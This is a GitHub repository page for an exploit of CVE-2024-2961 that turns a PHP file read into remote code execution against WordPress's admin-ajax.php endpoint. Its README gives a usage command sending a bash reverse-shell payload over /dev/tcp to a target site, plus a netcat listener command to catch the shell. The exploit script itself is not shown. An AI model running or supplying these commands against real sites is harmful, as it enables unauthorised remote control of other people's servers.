Skip to content
/ PHP-file-read-to-RCE-CVE-2024-2961- Public

To use, implement the Remote class, which tells the exploit how to send the payload.

0 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

regantemudo/PHP-file-read-to-RCE-CVE-2024-2961-

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
README.md
README.md
 
 
exploit.py
exploit.py
 
 

Repository files navigation

PHP file-read to RCE (CVE-2024-2961)

TODO Parse LIBC to know if patched

INFORMATIONS

To use, implement the Remote class, which tells the exploit how to send the payload.

This exploit script targets the admin-ajax.php endpoint on WordPress to achieve remote code execution.

Usage

python3 cnext-exploit.py 'http://blog.bigbang.com/wp-admin/admin-ajax.php' 'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"'

Set up a listener to catch the reverse shell:

nc -lvnp port

About

To use, implement the Remote class, which tells the exploit how to send the payload.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages